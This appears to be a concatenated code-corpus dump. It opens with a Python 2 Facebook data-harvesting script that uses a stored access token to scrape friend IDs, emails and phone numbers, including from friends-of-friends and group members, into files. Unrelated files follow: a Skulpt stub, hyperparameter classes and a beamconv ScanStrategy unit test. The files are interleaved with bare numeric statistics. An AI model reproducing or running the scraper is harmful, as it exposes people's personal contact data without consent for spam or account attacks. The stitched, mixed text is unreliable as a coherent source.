'\x1b[1;91m[!] Can\'t empty' grab_pilih() else: if cuih == '1': id_friends() else: if cuih == '2': idfrom_friends() else: if cuih == '3': id_member_grup() else: if cuih == '4': email() else: if cuih == '5': emailfrom_friends() else: if cuih == '6': nomor_hp() else: if cuih == '7': hpfrom_friends() else: if cuih == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found' grab_pilih() def id_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_id, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['data']: idfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(save_id) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def idfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket) z = json.loads(r.text) save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_idt, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['friends']['data']: idfromfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def id_member_grup(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') b = open(simg, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket) s = json.loads(re.text) for i in s['data']: idmem.append(i['id']) b.write(i['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name'] print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg b.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(simg) print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def email(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: em.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(mails) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def emailfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: emfromfriends.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def nomor_hp(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') url = 'https://graph.facebook.com/me/friends?access_token=' + toket r = requests.get(url) z = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for n in z['data']: x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hp.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(noms) print '\x1b[1;91m[!] An error occurred ' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def hpfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hpfromfriends.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Make file failed' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() if __name__ == '__main__': login()
62.867806
446
0.393726
7,023
69,909
3.895059
0.071052
0.105867
0.064741
0.051545
0.818351
0.805995
0.785195
0.761506
0.742716
0.729117
0
0.150075
0.472242
69,909
1,111
447
62.924392
0.587288
0.001044
0
0.631274
0
0.163127
0.333472
0.126375
0
0
0
0
0
0
null
null
0.09749
0.003861
null
null
0.262548
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
8
8d86e24818fbe4c5905ba6a4fe4381c3d02a9d88
39
py
Python
src/lib/mailcap.py
DTenore/skulpt
098d20acfb088d6db85535132c324b7ac2f2d212
[ "MIT" ]
2,671
2015-01-03T08:23:25.000Z
2022-03-31T06:15:48.000Z
src/lib/mailcap.py
wakeupmuyunhe/skulpt
a8fb11a80fb6d7c016bab5dfe3712517a350b347
[ "MIT" ]
972
2015-01-05T08:11:00.000Z
2022-03-29T13:47:15.000Z
src/lib/mailcap.py
wakeupmuyunhe/skulpt
a8fb11a80fb6d7c016bab5dfe3712517a350b347
[ "MIT" ]
845
2015-01-03T19:53:36.000Z
2022-03-29T18:34:22.000Z
import _sk_fail; _sk_fail._("mailcap")
19.5
38
0.769231
6
39
4.166667
0.666667
0.48
0
0
0
0
0
0
0
0
0
0
0.076923
39
1
39
39
0.694444
0
0
0
0
0
0.179487
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
8d9babd10a52a13a1fa13a6f110bf11b0b598f3b
2,179
py
Python
defences/dp/classification/hyperparameters.py
JunW15/AdvMT
4ec727199a810cd0b153c2d465b9660641e0f3f1
[ "MIT" ]
null
null
null
defences/dp/classification/hyperparameters.py
JunW15/AdvMT
4ec727199a810cd0b153c2d465b9660641e0f3f1
[ "MIT" ]
null
null
null
defences/dp/classification/hyperparameters.py
JunW15/AdvMT
4ec727199a810cd0b153c2d465b9660641e0f3f1
[ "MIT" ]
null
null
null
# =========== # BoE # =========== class HP_IMDB_BOE: batch_size = 64 learning_rate = 1e-3 learning_rate_dpsgd = 1e-3 patience = 5 tgt_class = 1 sequence_length = 512 class HP_DBPedia_BOE: batch_size = 256 learning_rate = 1e-3 learning_rate_dpsgd = 1e-3 patience = 2 tgt_class = 1 # start from 0 sequence_length = 256 class HP_Trec50_BOE: batch_size = 128 learning_rate = 5e-4 learning_rate_dpsgd = 5e-4 patience = 10 tgt_class = 32 # start from 0 sequence_length = 128 class HP_Trec6_BOE: batch_size = 16 learning_rate = 1e-4 learning_rate_dpsgd = 1e-4 patience = 10 tgt_class = 1 # start from 0 sequence_length = 128 # =========== # CNN # =========== class HP_IMDB_CNN: batch_size = 64 learning_rate = 1e-3 learning_rate_dpsgd = 1e-3 patience = 5 tgt_class = 1 sequence_length = 512 class HP_DBPedia_CNN: batch_size = 32 learning_rate = 1e-3 learning_rate_dpsgd = 1e-3 patience = 2 tgt_class = 1 # start from 0 sequence_length = 256 class HP_Trec50_CNN: batch_size = 128 learning_rate = 5e-4 learning_rate_dpsgd = 5e-4 patience = 10 tgt_class = 32 # start from 0 sequence_length = 128 class HP_Trec6_CNN: batch_size = 16 learning_rate = 1e-4 learning_rate_dpsgd = 1e-4 patience = 10 tgt_class = 1 # start from 0 sequence_length = 128 # =========== # BERT # =========== class HP_IMDB_BERT: batch_size = 32 learning_rate = 1e-4 learning_rate_dpsgd = 1e-4 patience = 2 tgt_class = 1 sequence_length = 512 class HP_DBPedia_BERT: batch_size = 32 learning_rate = 1e-4 learning_rate_dpsgd = 1e-4 patience = 1 tgt_class = 1 # start from 0 sequence_length = 256 class HP_Trec50_BERT: batch_size = 128 learning_rate = 5e-4 learning_rate_dpsgd = 5e-4 patience = 10 tgt_class = 32 # start from 0 sequence_length = 128 class HP_Trec6_BERT: batch_size = 16 learning_rate = 1e-4 learning_rate_dpsgd = 1e-4 patience = 5 tgt_class = 1 # start from 0 sequence_length = 128
18.623932
34
0.628729
318
2,179
4.006289
0.110063
0.22606
0.160126
0.134223
0.930926
0.929356
0.920722
0.920722
0.920722
0.861068
0
0.103713
0.283157
2,179
116
35
18.784483
0.711908
0.092244
0
0.833333
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
1
0
0
0
0
null
1
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
9
571636c78a59791d454fe47d6c02056987388dcf
47
py
Python
python-client/onesaitplatform/apimanager/__init__.py
esanfrutosminsait/onesait-cloud-platform-clientlibraries
31012e1eaa7da54fd08f9a63713043113969f1c9
[ "Apache-2.0" ]
14
2019-05-14T13:23:35.000Z
2019-12-24T14:49:02.000Z
python-client/onesaitplatform/apimanager/__init__.py
esanfrutosminsait/onesait-cloud-platform-clientlibraries
31012e1eaa7da54fd08f9a63713043113969f1c9
[ "Apache-2.0" ]
7
2019-11-13T09:38:03.000Z
2021-04-07T16:24:14.000Z
python-client/onesaitplatform/apimanager/__init__.py
esanfrutosminsait/onesait-cloud-platform-clientlibraries
31012e1eaa7da54fd08f9a63713043113969f1c9
[ "Apache-2.0" ]
9
2019-04-09T15:38:28.000Z
2021-03-24T13:10:14.000Z
from .apimanagerclient import ApiManagerClient
23.5
46
0.893617
4
47
10.5
0.75
0
0
0
0
0
0
0
0
0
0
0
0.085106
47
1
47
47
0.976744
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
93e719f9a7a130eb2b81ebf2ec2ccdf192456845
336
py
Python
cupy/linalg/eigenvalue.py
umitanuki/chainer
225c56b233e684ff4855451d2af4c2fb66915f21
[ "MIT" ]
null
null
null
cupy/linalg/eigenvalue.py
umitanuki/chainer
225c56b233e684ff4855451d2af4c2fb66915f21
[ "MIT" ]
null
null
null
cupy/linalg/eigenvalue.py
umitanuki/chainer
225c56b233e684ff4855451d2af4c2fb66915f21
[ "MIT" ]
1
2018-11-18T00:36:51.000Z
2018-11-18T00:36:51.000Z
def eig(a): # TODO(beam2d): Implement it raise NotImplementedError def eigh(a, UPLO='L'): # TODO(beam2d): Implement it raise NotImplementedError def eigvals(a): # TODO(beam2d): Implement it raise NotImplementedError def eigvalsh(a, UPLO='L'): # TODO(beam2d): Implement it raise NotImplementedError
17.684211
32
0.678571
40
336
5.7
0.35
0.175439
0.333333
0.368421
0.890351
0.890351
0.890351
0.877193
0.447368
0
0
0.015152
0.214286
336
18
33
18.666667
0.848485
0.318452
0
0.5
0
0
0.008929
0
0
0
0
0.055556
0
1
0.5
false
0
0
0
0.5
0
0
0
0
null
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
1
0
0
0
0
0
0
0
8
f566023dfd5a3b647bfc78ef02f0514bb0d9bda0
179
py
Python
mlrun/api/crud/__init__.py
shul/mlrun
d99e08ba8dce9833fca3ab00cdd246d873cf16b6
[ "Apache-2.0" ]
null
null
null
mlrun/api/crud/__init__.py
shul/mlrun
d99e08ba8dce9833fca3ab00cdd246d873cf16b6
[ "Apache-2.0" ]
null
null
null
mlrun/api/crud/__init__.py
shul/mlrun
d99e08ba8dce9833fca3ab00cdd246d873cf16b6
[ "Apache-2.0" ]
null
null
null
from .logs import Logs # noqa: F401 from .projects import Projects # noqa: F401 from .runtimes import Runtimes # noqa: F401 from .pipelines import list_pipelines # noqa: F401
35.8
51
0.75419
25
179
5.36
0.36
0.238806
0.268657
0
0
0
0
0
0
0
0
0.081633
0.178771
179
4
52
44.75
0.829932
0.240223
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
f57d25f5d596e9c862d84dbda9a0be7c82cc4822
31
py
Python
model/adder.py
JoseIuri/UVM_Python
0695abb6e8c9a962fa15a807eb10c2bc3160947e
[ "MIT" ]
4
2020-11-28T02:08:34.000Z
2021-03-12T07:28:46.000Z
model/adder.py
JoseIuri/UVM_Python
0695abb6e8c9a962fa15a807eb10c2bc3160947e
[ "MIT" ]
null
null
null
model/adder.py
JoseIuri/UVM_Python
0695abb6e8c9a962fa15a807eb10c2bc3160947e
[ "MIT" ]
null
null
null
def adder(a, b): return a+b
15.5
16
0.580645
7
31
2.571429
0.714286
0.222222
0
0
0
0
0
0
0
0
0
0
0.258065
31
2
17
15.5
0.782609
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
7
270d0e6291d26b1bd0db0723aaa6ca47b18848d3
2,044
py
Python
setup.py
WuJunkai2004/Dingbot
50730a05537687449c04ab2ba75a8f50ebcc5d2b
[ "MIT" ]
24
2020-06-21T06:21:04.000Z
2022-03-14T00:48:02.000Z
setup.py
WuJunkai2004/Dingbot
50730a05537687449c04ab2ba75a8f50ebcc5d2b
[ "MIT" ]
1
2020-08-09T06:02:30.000Z
2020-08-09T06:02:54.000Z
setup.py
WuJunkai2004/Dingbot
50730a05537687449c04ab2ba75a8f50ebcc5d2b
[ "MIT" ]
3
2021-02-21T18:42:19.000Z
2022-01-05T03:31:42.000Z
from distutils.core import setup import dingbot try: readme = open('README').read() except: readme = open('README',encoding='utf-8').read() try: kw = { "name": 'DingRobotPy', "version": dingbot.__version__, "description": 'Dingtalk group\'s robot API Python SDK', "long_description": readme, "author": 'WuJunkai', "author_email": 'wujunkai20041123@outlook.com', "url": 'https://github.com/WuJunkai2004/Dingbot', "download_url": 'https://github.com/WuJunkai2004/Dingbot', 'packages':['dingbot'], "classifiers": [ 'Development Status :: 5 - Production/Stable', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Internet', 'Topic :: Software Development :: Libraries :: Python Modules', ] } setup(**kw) except: pass try: kw = { "name": 'Dingbot', "version": dingbot.__version__, "description": 'Dingtalk group\'s robot API Python SDK', "long_description": readme, "author": 'WuJunkai', "author_email": 'wujunkai20041123@outlook.com', "url": 'https://github.com/WuJunkai2004/Dingbot', "download_url": 'https://github.com/WuJunkai2004/Dingbot', 'packages':['dingbot'], "classifiers": [ 'Development Status :: 5 - Production/Stable', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Internet', 'Topic :: Software Development :: Libraries :: Python Modules', ] } setup(**kw) except: pass
32.444444
76
0.546967
172
2,044
6.418605
0.383721
0.028986
0.050725
0.061594
0.875
0.875
0.875
0.875
0.875
0.875
0
0.024929
0.313112
2,044
62
77
32.967742
0.761396
0
0
0.821429
0
0
0.531282
0.028254
0
0
0
0
0
1
0
false
0.035714
0.035714
0
0.035714
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
271edb17b67dd129899c5484b0cbb6a335e35b63
48,486
py
Python
tests/test_scan_strategy.py
mreineck/beamconv
86e48f8bc219c538e1c47816d86b256a7459e53b
[ "MIT" ]
2
2018-09-14T07:40:46.000Z
2019-10-11T09:26:47.000Z
tests/test_scan_strategy.py
mreineck/beamconv
86e48f8bc219c538e1c47816d86b256a7459e53b
[ "MIT" ]
3
2020-07-28T16:05:24.000Z
2021-12-02T13:29:57.000Z
tests/test_scan_strategy.py
mreineck/beamconv
86e48f8bc219c538e1c47816d86b256a7459e53b
[ "MIT" ]
11
2018-09-14T11:00:32.000Z
2022-03-18T19:30:44.000Z
import unittest import numpy as np import healpy as hp from beamconv import ScanStrategy from beamconv import Beam, tools import os import pickle opj = os.path.join class TestTools(unittest.TestCase): @classmethod def setUpClass(cls): ''' Create random alm. ''' lmax = 50 np.random.seed(10) def rand_alm(lmax): alm = np.empty(hp.Alm.getsize(lmax), dtype=np.complex128) alm[:] = np.random.randn(hp.Alm.getsize(lmax)) alm += 1j * np.random.randn(hp.Alm.getsize(lmax)) # Make m=0 modes real. alm[:lmax+1] = np.real(alm[:lmax+1]) return alm cls.alm = tuple([rand_alm(lmax) for i in range(3)]) cls.lmax = lmax def test_init(self): scs = ScanStrategy(duration=200, sample_rate=10) self.assertEqual(scs.mlen, 200) self.assertEqual(scs.fsamp, 10.) self.assertEqual(scs.nsamp, 2000) # Test if we are unable to change scan parameters after init. self.assertRaises(AttributeError, setattr, scs, 'fsamp', 1) self.assertRaises(AttributeError, setattr, scs, 'mlen', 1) self.assertRaises(AttributeError, setattr, scs, 'nsamp', 1) def test_init_no_mlen(self): # Test if we can also init without specifying mlen. scs = ScanStrategy(sample_rate=20, num_samples=100) # nsamp = mlen * sample_rate self.assertEqual(scs.mlen, 5) self.assertEqual(scs.fsamp, 20) self.assertEqual(scs.nsamp, 100) def test_init_no_sample_rate(self): # Test if we can also init without specifying mlen. scs = ScanStrategy(duration=5, num_samples=100) # nsamp = mlen * sample_rate self.assertEqual(scs.mlen, 5) self.assertEqual(scs.fsamp, 20) self.assertEqual(scs.nsamp, 100) def test_init_zero_duration(self): # Sample rate should be zero scs = ScanStrategy(duration=0, sample_rate=10) # nsamp = mlen * sample_rate self.assertEqual(scs.mlen, 0) self.assertEqual(scs.fsamp, 0) self.assertEqual(scs.nsamp, 0) def test_init_err(self): # Test if init raises erorrs when user does not # provide enough info. with self.assertRaises(ValueError): ScanStrategy(duration=5) with self.assertRaises(ValueError): ScanStrategy(num_samples=5) with self.assertRaises(ValueError): ScanStrategy(sample_rate=5) # Or if nsamp = mlen * sample_rate is not satisfied. with self.assertRaises(ValueError): ScanStrategy(duration=10, sample_rate=20, num_samples=100) # Or when sample_rate is zero or negative. with self.assertRaises(ValueError): ScanStrategy(sample_rate=0, duration=10) with self.assertRaises(ValueError): ScanStrategy(sample_rate=-2, duration=10) def test_el_steps(self): scs = ScanStrategy(duration=200, sample_rate=30) scs.set_el_steps(10, steps=np.arange(5)) nsteps = int(np.ceil(scs.mlen / float(scs.step_dict['period']))) self.assertEqual(nsteps, 20) for step in range(12): el = next(scs.el_step_gen) scs.step_dict['step'] = el self.assertEqual(el, step%5) self.assertEqual(scs.step_dict['step'], el) 